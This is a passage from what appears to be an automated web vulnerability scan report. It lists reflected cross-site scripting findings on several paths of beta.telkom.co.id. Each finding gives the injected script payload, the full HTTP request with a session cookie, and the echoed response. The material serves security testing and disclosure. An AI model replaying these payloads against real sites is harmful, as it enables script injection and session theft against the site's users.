UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:15 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f("");

4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a5c"><script>alert(1)</script>c7f881fbc98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investord3a5c"><script>alert(1)</script>c7f881fbc98/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7349a<script>alert(1)</script>1dabfe6b8e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor7349a<script>alert(1)</script>1dabfe6b8e6/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...

4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9360a--><script>alert(1)</script>951e05938fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor9360a--><script>alert(1)</script>951e05938fc/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f56a1--><script>alert(1)</script>3a5776513bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23902
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-persf56a1--><script>alert(1)</script>3a5776513bf/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e46c<script>alert(1)</script>f7a1aef4314 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:24 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23893
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/hubungan-investor/siaran-pers7e46c<script>alert(1)</script>f7a1aef4314/undangan-acara-investor-company-site-visit-di-manado.html</b>
...[SNIP]...

4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617e2"><script>alert(1)</script>ed966d48c0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:19 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23899
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/hubungan-investor/siaran-pers617e2"><script>alert(1)</script>ed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html?&lid=en">
...[SNIP]...

4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65705<script>alert(1)</script>c8c75b10326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaan65705<script>alert(1)</script>c8c75b10326/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23710
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/info-perusahaan65705<script>alert(1)</script>c8c75b10326/index.html</b>
...[SNIP]...

4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 17160--><script>alert(1)</script>6ef070357e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /info-perusahaan17160--><script>alert(1)</script>6ef070357e7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:57 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23719
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaan17160--><script>alert(1)</script>6ef070357e7/index.html?&lid=en">
...[SNIP]...

4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0cb4"><script>alert(1)</script>252f949c3a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:24:47 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/info-perusahaana0cb4"><script>alert(1)</script>252f949c3a2/index.html?&lid=en">
...[SNIP]...

4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2384c--><script>alert(1)</script>ac061dfca82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:09 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23360
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media2384c--><script>alert(1)</script>ac061dfca82/artikel-infokom/index.html?&lid=id" class="blue">
...[SNIP]...

4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbff7"><script>alert(1)</script>ae3c0457ac0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:59 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacbff7"><script>alert(1)</script>ae3c0457ac0/artikel-infokom/index.html?&lid=en">
...[SNIP]...

4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4080<script>alert(1)</script>71eea796522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:03 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23351
Content-Type: text/html

